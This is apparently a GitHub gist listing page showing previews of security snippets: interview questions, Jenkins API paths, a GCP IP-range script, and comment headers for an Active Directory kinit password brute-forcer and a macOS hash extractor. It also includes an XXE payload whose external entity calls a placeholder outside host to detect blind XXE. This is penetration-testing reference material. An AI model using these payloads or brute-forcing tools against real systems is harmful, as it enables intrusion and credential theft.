Skip to content

Instantly share code, notes, and snippets.

Avatar

Chris Gates carnal0wnage

View GitHub Profile
@namishelex01
namishelex01 / Security Engineer - Interview Questions
Last active Jun 17, 2021
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names
View Security Engineer - Interview Questions
> What is information security and how is it achieved?
> What are the core principles of information security?
> What is non-repudiation (as it applies to IT security)?
> What is the relationship between information security and data availability?
> What is a security policy and why do we need one?
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View README.md
View jenkins-api.md

jobs

jenkins_url + /api/json?tree=jobs[name,color]

builds

jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]

last build

@ropnop
ropnop / kinit_brute.sh
Last active Jun 6, 2021
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
View kinit_brute.sh
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
@teddziuba
teddziuba / osx_extract_hash.py
Last active Jun 6, 2021
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
View osx_extract_hash.py
#!/usr/bin/env python3
"""
Mac OSX Catalina User Password Hash Extractor
Extracts a user's password hash as a hashcat-compatible string.
Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords
(hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist
format, so previously reported methods for extracting the hash don't work.
@jhaddix
jhaddix / Github bash generated search links (from hunter.sh)
Created Jan 12, 2020
Github bash generated search links (from hunter.sh)
View Github bash generated search links (from hunter.sh)
@n0531m
n0531m / list_gcp_iprange.sh
Last active Jun 2, 2021
Google Cloud Platform : ip address range
View list_gcp_iprange.sh
#!/bin/bash
# https://cloud.google.com/compute/docs/faq#find_ip_range
# nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8
myarray=()
for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :`
do
myarray+=($LINE)
for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`